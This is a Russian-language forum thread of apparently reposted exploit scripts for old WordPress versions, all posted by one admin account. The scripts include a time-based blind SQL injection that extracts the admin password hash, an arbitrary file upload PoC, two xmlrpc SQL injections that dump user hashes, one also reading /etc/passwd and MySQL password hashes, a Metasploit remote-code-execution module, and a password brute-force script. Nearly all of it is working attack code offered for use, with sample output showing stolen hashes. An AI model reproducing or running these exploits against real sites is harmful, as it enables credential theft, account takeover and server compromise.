|
|
WordPress
| |
| aka_kludge | Дата: Пятница, 05.06.2009, 12:04 | Сообщение # 1 |
 Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
| Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
//====================================================================== echo "Target: $url\n";
echo "sql table prefix: $prefix\n"; if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
} echo "cookie suffix: $suffix\n"; echo "testing probe delays \n"; $norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n"; $hash = get_hash(); add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash"); echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya!  \n");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = 'user_pass';
$out = '';
echo "finding hash now ...\n";
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($field,$i);
echo "got $field pos $i --> $ch\n";
$out .= "$ch";
echo "current value for $field: $out \n";
}
echo "\nFinal result: $field=$out\n\n";
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*"; // First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);
if($letter)
{
$min = 97;
$max = 102;
echo "char to find is [a-f]\n";
}
else
{
$min = 48;
$max = 57;
echo "char to find is [0-9]\n";
} $curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
} echo "curr: $curr--$max--$min\n";
}
return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;
while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();
if($buff === '-1')
{
break;
}
else
{
echo "test_condition() - try $try - invalid return value ...\n";
$try ++;
if($try > $maxtry)
{
die("too many tries - exiting ...\n");
}
else
{
echo "trying again - try $try ...\n";
}
}
}
$diff = $end - $start;
$delay = intval($diff * 10);
if($delay > ($norm_delay * 2))
{
$bret = true;
}
return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo "$fa\n";
$sa = test_md5delay($testcnt);
echo "$sa\n";
$fb = test_md5delay(1);
echo "$fb\n";
$sb = test_md5delay($testcnt);
echo "$sb\n";
$fc = test_md5delay(1);
echo "$fc\n";
$sc = test_md5delay($testcnt);
echo "$sc\n";
$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo "mean nondelayed - $mean_nondelayed dsecs\n";
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs\n";
return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;
// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix); $start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();
if(intval($buff) !== -1)
{
die("test_md5delay($cnt) - invalid return value, exiting ...");
} $diff = $end - $start;
$delay = intval($diff * 10); return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}
if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
} if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
} $fc = curl_exec($ch);
curl_close($ch);
return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;
$buf .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
fclose($fh);
}
///////////////////////////////////////////////////////////////////////
?>
|
| |
| |
| aka_kludge | Дата: Пятница, 05.06.2009, 12:05 | Сообщение # 2 |
|
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
| WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit #! /usr/bin/env perl # Wordpress 2.2 and Wordpress MU <= 1.2.2 Arbitrary File Upload PoC
#
# Credits : Alexander Concha
# Website : http://www.buayacorp.com/
# Advisory: http://www.buayacorp.com/files/wordpress/wordpress-advisory.html use Digest::MD5 qw(md5_hex);
use LWP::UserAgent; my $ua = new LWP::UserAgent;
my $blog = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
my $remote_file = $ARGV[3];
my $local_file = $ARGV[4];
my $post_id = $ARGV[5]; if (@ARGV < 4) {
print "\nUsage:\n";
print " wp-file-upload.pl [local_file] [post_id]\n\n";
print " - full path to WordPress. http://victim.com/wordpress/ \n";
print " - valid username with any of these roles: author, editor, administrator\n";
print " - valid password for the user\n";
print " - full path to the remote file. /home/vulnerable.com/wordpress/wp-content/uploads/foo.php\n";
print " [local_file] - file to upload\n";
print " [post_id] - every time this script is executed creates a new post, specify a post_ID if you already run it\n\n";
exit();
}
$ua->requests_redirectable([]);
$blog =~ s/\/*$/\//; $url = 'wp-app.php';
if ( 200 != $ua->head($url . '?action=/service')->code ) {
$url = 'app.php';
die "\nIt seems that this WP installation is not vulnerable: app.php and wp-app.php were not found.\n"
unless 200 == $ua->head($url . '?action=/service')->code;
} $auth_cookie = get_auth_cookie(); sub LWP::UserAgent::simple_request {
my($self, $request, $arg, $size) = @_;
$request->header('Cookie' => $auth_cookie);
$request->content_type('image/gif') if $request->method eq "PUT";
$request->uri($blog . $request->uri); $self->_request_sanity_check($request);
my $new_request = $self->prepare_request($request);
$response = $self->send_request($new_request, $arg, $size); print $request->method . " " . $request->uri . " " . $response->code . "\n"; return $response;
} sub get_contents {
$file = shift;
if ( -e $file ) {
open FILE, $file or die("Invalid local file");
$file = join('', );
close FILE;
} else {
$file = <
PHP
}
return $file;
}
sub get_auth_cookie {
$response = $ua->head('wp-login.php?logout');
if ( $response->headers->header('Set-Cookie') =~ m/wordpress(user|pass)(.*?)=/ ) {
return "wordpressuser$2=$user;wordpresspass$2=".md5_hex(md5_hex($pass));
}
return '';
}
if (0 == $post_id) {
$response = $ua->get('wp-admin/post-new.php');
die ("\nInvalid credentials or blog url.\n\n" . $response->as_string) unless 200 == $response->code; if ( $response->content =~ m/name=._wpnonce. value=.([a-z\d]{10})./ ) {
$response = $ua->post('wp-admin/post.php', [
'_wpnonce' => $1,
'action' => 'post',
'post_ID' => $post_id,
'post_type' => 'post',
'post_title' => 'foo',
'metakeyselect' => '#NONE#',
'metakeyinput' => '_wp_attached_file',
'metavalue' => $remote_file
], 'Cookie' => $auth_cookie); # Checks for post-new.php?posted=post_ID
if ( $response->headers->header('Location') =~ m/posted=(\d+)/ ) {
$post_id = $1;
}
}
}
die "\nCould not get a valid post_id value.\n" unless 0 != $post_id; $request = HTTP::Request->new(PUT => $url . '?action=/attachment/file/'.$post_id);
$request->content(get_contents($local_file));
$response = $ua->request($request); if ( 200 == $response->code ) {
print "\nIt seems that the file has been posted successfully... :P\n";
print "Use the following value to update the remote file: post_id '$post_id'\n";
} else {
print "\nError: there is no attachment metadata for post_id=$post_id\n\n" . $response->as_string() . "\n";
}
|
| |
| |
| aka_kludge | Дата: Пятница, 05.06.2009, 12:06 | Сообщение # 3 |
|
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
| Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit /*
El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php:
function wp_suggestCategories($args) {
global $wpdb; $this->escape($args); $blog_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$category = $args[3];
$max_results = $args[4]; if(!$this->login_pass_ok($username, $password)) {
return($this->error);
} // Only set a limit if one was provided.
$limit = "";
if(!empty($max_results)) {
$limit = "LIMIT {$max_results}";
} $category_suggestions = $wpdb->get_results("
SELECT cat_ID category_id,
cat_name category_name
FROM {$wpdb->categories}
WHERE cat_name LIKE '{$category}%'
{$limit}
"); return($category_suggestions);
} Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results, por lo que es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users. Para que un atacante logre su objetivo, es necesario que éste tenga una cuenta de usuario válida (una cuenta de tipo suscriber basta y sobra) en el sitio víctima. Preparé un pequeño exploit (Creditos: Alex) que devuelve la lista de usuarios con sus respectivas contraseñas en MD5, además también incluye las cookies de autenticación para cada usuario. Credits: Alex de la Concha code c sharp:
*/
using System;
using System.Net;
using System.Text;
using System.Xml;
using System.Text.RegularExpressions;
using System.Security.Cryptography; class Program
{
static void Main(string[] args)
{
string targetUrl = "http://localhost/wp/";
string login = "alex";
string password = "1234"; string data = @"
wp.suggestCategories
1
{0}
{1}
1
0 UNION ALL SELECT user_login, user_pass FROM {2}users
"; string cookieHash = GetCookieHash(targetUrl); using (WebClient request = new WebClient())
{
/* Probar con el prefijo por omisión */
string response = request.UploadString(targetUrl + "xmlrpc.php",
string.Format(data, login, password, "wp_svn_")); /* Se hace una nueva petición si la consulta anterior falla */
Match match = Regex.Match(response, @"FROM\s+(.*?)categories\s+");
if (match.Success)
{
response = request.UploadString(targetUrl + "xmlrpc.php ",
string.Format(data, login, password, match.Groups[1].Value));
} try
{
XmlDocument doc = new XmlDocument();
doc.LoadXml(response); XmlNodeList nodes = doc.SelectNodes("//struct/member/value"); if (nodes != null && doc.SelectSingleNode("/methodResponse/fault") == null)
{
string user, pass;
/* Mostrar lista de:
* Usuario md5(contraseña)
* Cookie de Autenticación
*
*/
for (int i = 0; i < nodes.Count / 2 + 1; i += 2)
{
user = nodes.Item(i).InnerText;
pass = nodes.Item(i + 1).InnerText;
Console.WriteLine("Usuario: {0}\tMD5(Contraseña): {1}",
user,
pass);
Console.WriteLine("Cookie: wordpressuser_{0}={1};wordpresspass_{0}={2}\n",
cookieHash,
user,
MD5(pass));
}
}
else
{
Console.WriteLine("Error:\n{0}", response);
}
}
catch (Exception ex)
{
Console.WriteLine("Error:\n" + ex.ToString());
}
}
} private static string GetCookieHash(string targetUrl)
{
WebRequest request = WebRequest.Create(targetUrl + "wp-login.php?action=logout");
request.Method = "HEAD";
(request as HttpWebRequest).AllowAutoRedirect = false; WebResponse response = request.GetResponse();
if (response != null)
{
Match match = Regex.Match(response.Headers["Set-Cookie"],
@"wordpress[a-z]+_([a-z\d]{32})",
RegexOptions.IgnoreCase); if (match.Success)
return match.Groups[1].Value;
}
return string.Empty;
}
public static string MD5(string password)
{
MD5CryptoServiceProvider x = new MD5CryptoServiceProvider();
byte[] bs = Encoding.UTF8.GetBytes(password);
bs = x.ComputeHash(bs);
StringBuilder s = new StringBuilder();
foreach (byte b in bs)
{
s.Append(b.ToString("x2").ToLower());
}
return s.ToString();
}
}
/*
Para corregir este problema, mientras liberan actualizaciones para Wordpress 2.2, es editar el archivo xmlrpc.php y cambiar la línea $max_results = $args[4]; de la función wp_suggestCategories por $max_results = (int) $args[4]; o en su defecto bloquear el acceso a xmlrpc.php. o malo esque tienes que tener una cuenta aunque sea con los minimos permisos para obtener los demas nombres de users con sus respectivos MD5. static void Main(string[] args)
{
string targetUrl = "http://localhost/wp/";
string login = "alex";
string password = "1234"; hay seria la ruta donde esta colocado el wordpress 2.2, tu nombre de usuario y tu password.
Ya se creo un zip con los archivos vulnerables ya reparados [ xmlrpc.php, wp-admin/post-new.php, wp-admin/page-new.php , wp-admin/users-edit.php. ] :: [Slappter] ::
*/
|
| |
| |
| aka_kludge | Дата: Пятница, 05.06.2009, 12:07 | Сообщение # 4 |
|
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
| Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit #!/usr/bin/perl -w #Wordpress 2.1.2 SQL Injection POC
#Credits: sid@notsosecure.com
#Thanks to ferruh (ferruh@mavituna.com)for improving my exploitation skills
#website:www.notsosecure.com #Wordpress version 2.1.2 is vulnerable to sql injection. This POC works when exploting with the credentials of a valid user. The user can belong to 'contributor' role or any higher role. Versions before 2.1.2 have not been tested but are most likely to be vulnerable as well. #Example:---------------------------------------------------------------------------------------
#C:\wp-xmlrpc-2-2-sql.pl" http://192.168.2.4/apache2-default/wordpress/ author author 5
#
# The usage is correct
# Trying Host http://192.168.2.4/apache2-default/wordpress/ ...
#[+] The xmlrpc-2-2 server seems to be working
#--------------------
#Username for id = 1 is:--> admin
#
#Md5 hash for user: admin
#
#is: 21232f297a57a5a743894a0e4a801fc3
#
#--------------------
#Username for id = 2 is:--> contri
#
#Md5 hash for user: contri
#
#is: 95a178dde9d3fa2bde4971f10d3acc3e
#
#--------------------
#Username for id = 3 is:--> author
#
#Md5 hash for user: author
#
#is: 02bd92faa38aaa6cc0ea75e59937a1ef
#
#-----------------------
#Total Number of Users found:-->3
#-----------------------
#Mysql is running as: root@localhost
#
#Encrypted password for: root@localhost
# is: root@localhost67457e226a1a15bd
#
#This deserves no mercy.... Lets get the /etc/passwd
#.......imho...Here is the /etc/passwd file:
#root:x:0:0:root:/root:/bin/bash
#daemon:x:1:1:daemon:/usr/sbin:/bin/sh
#bin:x:2:2:bin:/bin:/bin/sh
#sys:x:3:3:sys:/dev:/bin/sh
#sync:x:4:65534:sync:/bin:/bin/sync
#games:x:5:60:games:/usr/games:/bin/sh
#man:x:6:12:man:/var/cache/man:/bin/sh
#lp:x:7:7:lp:/var/spool/lpd:/bin/sh
#mail:x:8:8:mail:/var/mail:/bin/sh
#news:x:9:9:news:/var/spool/news:/bin/sh
#uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
#proxy:x:13:13:proxy:/bin:/bin/sh
#www-data:x:33:33:www-data:/var/www:/bin/sh
#backup:x:34:34:backup:/var/backups:/bin/sh
#list:x:38:38:Mailing List Manager:/var/list:/bin/sh
#gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
#messagebus:x:100:103::/var/run/dbus:/bin/false
#postgres:x:101:105:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
#haldaemon:x:103:109:Hardware abstraction layer,,,:/home/haldaemon:/bin/false
#gdm:x:104:112:Gnome Display Manager:/var/lib/gdm:/bin/false
#mysql:x:105:113:MySQL Server,,,:/var/lib/mysql:/bin/false
#sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
#snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
#postfix:x:108:116::/var/spool/postfix:/bin/false
#stunnel4:x:109:118::/var/run/stunnel4:/bin/false
#arpwatch:x:111:120:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
#statd:x:112:65534::/var/lib/nfs:/bin/false
#sfs:x:113:121::/var/lib/sfs:/bin/false
#ftp:x:114:65534::/home/ftp:/bin/false
#Debian-exim:x:115:122::/var/spool/exim4:/bin/false
#telnetd:x:116:123::/nonexistent:/bin/false
#-------------------------------------------------------------------------------------------------------
#use warnings;
use LWP::UserAgent;
my $ua = new LWP::UserAgent;
$ua->agent("Wordpress Hash Grabber v2.0" . $ua->agent); my $host = $ARGV[0]; # The path to xmlrpc.php
my $username= $ARGV[1];#username
my $password= $ARGV[2];#password
my $postid= $ARGV[3];#post id which the user can edit
my $pref = 'wp_'; # database prefix!
my $hash_pass=""; #$root='root@localhost.com'; if (@ARGV < 4)
{
print " -----------------------------------------------------------------------\n";
print " wp-xmlrpc-sql.pl - Wordpress xmlrpc.php 'post_id' sql injection exploit\n Version 2.1.2";
print " by NotSoSecure // www.notsosecure.com \n";
print " coded by sid //sid\@notsosecure.com // 31.03.2007\n";
print " ------------------------------------------------------------------------\n";
print " Usage:\n";
print " wp-xmlrpc-sql.pl \n";
print "\n";
print " - host for attack\n full path eg. http://192.168.1.4/wordpress/ ";
print " - valid username, can be in any of these role: contributor, author, editor \n";
print " - valid password for the user\n";
print " - valid post_id which the user can edit\n";
print " ------------------------------------------------------------------------\n";
exit();
} print "\n The usage is correct\n Trying Host $host ...\n"; my $res = $ua->get($host.'/xmlrpc.php'); if ( $res->content =~ /XML-RPC server accepts POST requests only/is )
{
print "[+] The xmlrpc server seems to be working \n";
}
else
{
print "--------------------\n";
print "[error]--> Something seems to be wrong with the xmlrpc.php \nCheck the full path to xmlrpc.php again\n ";
# Sloppy way of debugging, remove if you want
open(LOG, ">wp_out.html"); print LOG $res->content;
exit;
} for ($i=1; $i<=100 ;$i++)
{ #bug: if a user has been deleted the corresponding id will be missing.
#change this to point to the known ids or the usernames, or just make it go for top 100 ids #obtaining usernames and userid
my $sql = "mt.setPostCategories ".$postid." union all select user_login from wp_users where id=".$i." ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 ";
my $req = new HTTP::Request POST => $host . "/xmlrpc.php";
$req->content($sql);
$res = $ua->request($req);
$out = $res->content;
if($out=~ /Bad login\/pass combination/)
{
print "--------------------\n";
print "[error]-->Invalid username/password conbination\n"; exit;
} if($out=~ /Sorry, you can not edit this post/)
{
print "--------------------\n";
print "[error]-->INVALID postid \n Supply a post id which can be edited by this user.\n"; exit;
} if ($out =~ /DELETE FROM wp_post2cat/)
{ #print "found";
print "--------------------\n";
@result2=split(/category_id =/,$out);
#to do: remove the assumption that username is less than 10 char
$final=substr($result2[1],1,10);
print "Username for id = ".$i." is:--> ".$final."\n";
no warnings;
#obtaining md5 hash for the username
my $sql2 = "mt.setPostCategories ".$postid." union all select user_pass from wp_users where id=".$i." ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 ";
my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php";
$req2->content($sql2);
$res2 = $ua->request($req2);
$out2 = $res2->content; @result3=split(/category_id =/,$out2);
$hash=substr($result3[1],1,33);
print "Md5 hash for user: ".$final." \nis: ".$hash."\n"; }
else
{
print "-----------------------\n";
print "Total Number of Users found:-->".($i-1)."\n"; print "-----------------------\n";
#lets find wat the db is running as: my $sql2 = "mt.setPostCategories ".$postid." union all select user() ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 ";
my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php";
$req2->content($sql2);
$res2 = $ua->request($req2);
$out2 = $res2->content; @result3=split(/category_id =/,$out2);
$hash_user=substr($result3[1],1,20);
print "Mysql is running as: ".$hash_user."\n"; #lets get the password hash of the db_user for offline cracking
#buggy code
my $sql3 = "mt.setPostCategories ".$postid." union all select concat(user(),mysql.user.Password) from mysql.user where user=user() ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 ";
my $req3 = new HTTP::Request POST => $host . "/xmlrpc.php";
$req3->content($sql3);
$res3 = $ua->request($req3);
$out3 = $res3->content;
my $hash_pass="";
#print $out3;
if ($out3=~m/SELECT command denied to user/) {
print "Cant get the password for this user, \nPermission Denied, Thats better security!!";
exit;}
else{
@result3=split(/category_id =/,$out3);
$hash_pass=substr($result3[1],1,30);
print $hash_pass;
if ($hash_pass eq "") {
print "No Password set";
}
else{
print "Encrypted password for: ".$hash_user."\n is ".$hash_pass."\n";
} #IF database is running as root, lets rip it apart
if ($hash_user =~m/root/) {
print"\nThis deserves no mercy....\n Lets get the /etc/passwd\n.......imho...\n\n"; my $sql4 = "mt.setPostCategories ".$postid." union all select load_file(0x2f6574632f706173737764) ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 ";
my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php";
$req2->content($sql4);
$res2 = $ua->request($req2);
$out2 = $res2->content;
@result3=split(/category_id =/,$out2);
$hash=substr($result3[1],1,1600); print "Here is the /etc/passwd file:\n\n\n";
print $hash;
}
exit; } }
}
|
| |
| |
| aka_kludge | Дата: Пятница, 05.06.2009, 12:07 | Сообщение # 5 |
|
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
| Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit) ##
# Title: Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)
# Name: php_wordpress.pm
# License: Artistic/BSD/GPL
# Info: I lub metasploit yummmm (str0ke ! milw0rm.com).
#
# Recoded Kartoffelguru's php code for metasploit. I love cookies. /str0ke
#
#
#
# - This is an exploit module for the Metasploit Framework, please see
# http://metasploit.com/projects/Framework for more information.
#
## package Msf::Exploit::php_wordpress;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes; my $advanced = { }; my $info = {
'Name' => 'Wordpress <= 1.5.1.3 Remote Code Execution eXploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'str0ke' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'RPATH' => [1, 'DATA', 'Path WordPress root directory', '/'],
'SSL' => [0, 'BOOL', 'Use SSL'],
}, 'Description' => Pex::Text::Freeform(qq{
This module exploits a code execution exploit in wordpress blog <= 1.5.1.3.
}), 'Refs' =>
[
['MIL', '1142'],
], 'Payload' =>
{
'Space' => 512,
'Keys' => ['cmd', 'cmd_bash'],
}, 'Keys' => ['wordpress'],
}; sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
} sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $path = $self->GetVar('RPATH');
my $cmd = $self->GetVar('EncodedPayload')->RawPayload; my $encoded = Pex::Text::Base64Encode("passthru(\"$cmd\");");
$encoded =~ s/\n//gm; my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $encoded)); $byte.=".chr(32)"; my $str = Pex::Text::Base64Encode('args[0]=eval(base64_decode('.$byte.')).die()&args[1]=x'); $str =~ s/\n//gm; my $data = "wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;".
"wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;".
"cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=$str".
";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;".
"wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;".
"wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;"; my $req =
"GET $path HTTP/1.0\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\r\n".
"Host: $vhost:$target_port\r\n".
"Pragma: no-cache\r\n".
"Accept: */*\r\n".
"Cookie: $data\r\n".
"\r\n"; my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'), ); if ($s->IsError){
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
} $self->PrintLine(" Sending the malicious WordPress Get request..."); $s->Send($req); my $results = $s->Recv(-1, 20);
$s->Close();
$self->PrintLine($results); return;
} 1;
|
| |
| |
| aka_kludge | Дата: Пятница, 05.06.2009, 12:09 | Сообщение # 6 |
|
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
| WordPress <= 1.5.1.1 SQL Injection Exploit #!/usr/bin/perl -w
#
# SQL Injection Exploit for WordPress <= 1.5.1.1
# This exploit shows the username of the administrator of the blog and his
# password crypted in MD5, you must only choose the correct version of the target
# Related advisory: http://www.gentoo.org/security/en/glsa/glsa-200506-04.xml
# Patch: download the last version at http://wordpress.org/download/
# Coded by Alberto Trivero use LWP::Simple; print "\n\t====================================\n";
print "\t= Exploit for WordPress <= 1.5.1.1 =\n";
print "\t= by Alberto Trivero =\n";
print "\t====================================\n\n"; if(!$ARGV[0] or !($ARGV[0]=~m/http/) or !($ARGV[1]==1 or $ARGV[1]==2)) {
print "Usage:\nperl $0 [full_target_path] [target_version: 1 OR 2]\nVersion 1: WordPress <= 1.5\nVersion 2: WordPress 1.5.1 - 1.5.1.1\n\n";
print "Examples:\nperl $0 http://www.example.com/wordpress/ 2\n";
exit(0);
} $page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!" if($ARGV[1]==1);
$page=get($ARGV[0]."index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!" if($ARGV[1]==2);
print "[+] Connected to: $ARGV[0]\n";
$page=~m/:([a-f0-9]{32}):(.*?):/;
print "[+] Username of administrator is: $2\n" if($2);
print "[+] MD5 hash of password is: $1\n" if($1);
print "[-] Unable to retrieve username\n" if(!$2);
print "[-] Unable to retrieve hash of password\n" if(!$1);
|
| |
| |
| aka_kludge | Дата: Пятница, 05.06.2009, 12:12 | Сообщение # 7 |
|
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
| Wordpress <= 2.x dictionnary & Bruteforce attack ############## Source code #####################
#!usr/bin/python
# Flaw found on Wordpress
# that allow Dictionnary & Bruteforce attack
# Greetz goes to : NeoMorphS, Tiky
# Vendor : http://wordpress.org/
# Found by : Kad (kadfrox (at) gmail (dot) com [email concealed] / #kadaj-diabolik (at) hotmail (dot) fr [email concealed])
import urllib , urllib2, sys, string
tab = "%s%s%s"%( string.ascii_letters, string.punctuation, string.digits )
tab = [ i for i in tab ]
def node( table, parent, size ):
if size == 0:
pass
else:
for c in table:
string = "%s%s"%( parent, c )
data = {'log': sys.argv[2],
'pwd': string}
print "[+] Testing : "+string
request = urllib2.Request(server, urllib.urlencode(data))
f = urllib2.urlopen(request).read()
if not "Incorrect password." in f: print "[!] Password is : "+mot ; break
node( table, string, size-1 ) def bruteforce( table, size ):
for c in table:
node( table, c, size-1 ) if (len(sys.argv) < 3):
print "Usage : float.py "
print "\nDefault: User is 'admin'"
print "Choice : 1} Dictionnary Attack, use dictionnary file"
print " 2} Bruteforce Attack, use number of character for password" else:
server = sys.argv[1]
if sys.argv[3] == "1":
a , b = open(sys.argv[4],'r') , 0
for lines in a: b = b + 1
a.seek(0)
c = 0
while (c < b):
mot = a.readline().rstrip()
data = {'log': sys.argv[2],
'pwd': mot}
print "[+] Testing : "+mot
request = urllib2.Request(server, urllib.urlencode(data))
f = urllib2.urlopen(request).read()
if not "Incorrect password." in f: print "[!] Password is : "+mot ; break
else: c = c + 1 ; pass
if sys.argv[3] == "2":
print "[-] Server is : "+server
print "[-] User is : "+sys.argv[2]
print "[-] Number of characters are : "+sys.argv[4]
number = int(sys.argv[4])
